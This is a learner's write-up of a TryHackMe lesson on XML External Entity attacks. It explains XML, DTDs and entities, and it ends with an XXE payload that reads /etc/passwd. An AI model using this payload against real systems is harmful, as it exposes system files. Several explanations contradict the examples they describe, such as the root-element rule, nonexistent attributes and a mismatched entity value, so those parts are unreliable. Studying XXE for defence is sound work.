Security Basics: XXE(XML External Entity) - TryHackMe

Finally I am here with the topic that I was frightened for no reason. Now I am happy that I did not gave in for my fears.

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system.

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).

1) An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

2) out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker must reflect the output of their XXE payload to some other file or their own server.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data.

Every XML document starts with an XML Prolog.

<? xml version=”1.0” encoding=”UTF-8”?>

In the above provided syntax the XML document version and encoding type is provided. It is not mandatory to have the prolog but it is considered as a good practice.Let’s consider the below provided example:

<? xml version=”1.0” encoding=”UTF-8”?>
<mail>
<to>test111</to>
<from>boost</from>
<subject>About XXE</subject>
<text>Teach about XXE</text>
</mail>

The <mail> element is the ROOT element of the XML file. It would be considered as invalid XML file if there is root element present within it.

All the other elements are called as children element. The XML element also has attributes present such as “message” and “category”.

XXE – DTD

DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.

Let us try to understand this with the help of an example. Say we have a file named “test.dtd” with the following content.

<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>

. #PCDATA means parseable character data. Now we can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD. Lets use the previously provided example to understand how the DTD validates the XML files.

<? xml version=”1.0” encoding=”UTF-8”?>
<mail>
<to>test111</to>
<from>boost</from>
<subject>About XXE</subject>
<text>Teach about XXE</text>
</mail>

1. !DOCTYPE note - Defines a root element of the document named note

2. !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"

3. !ELEMENT to - Defines the to element to be of type "#PCDATA"

4. !ELEMENT from - Defines the from element to be of type "#PCDATA"

5. !ELEMENT heading - Defines the heading element to be of type "#PCDATA"

6. !ELEMENT body - Defines the body element to be of type "#PCDATA"

7. Note: !ENTITY – Defines the item of the data that is present in the XML document.

Now we see some payloads and how do they work.

<!DOCTYPE replace [<!ENTITY name "boost"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>

As we can see we are defining a ENTITY called name and assigning a value feast. And later we use this entity in our code.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

We use the above provided syntax to read a file from the system by defining the “ENTITY” and having it use the “SYSTEM” keyword. Here we are defining the ENTITY with the name read and we are setting the value of system to read a file from the system.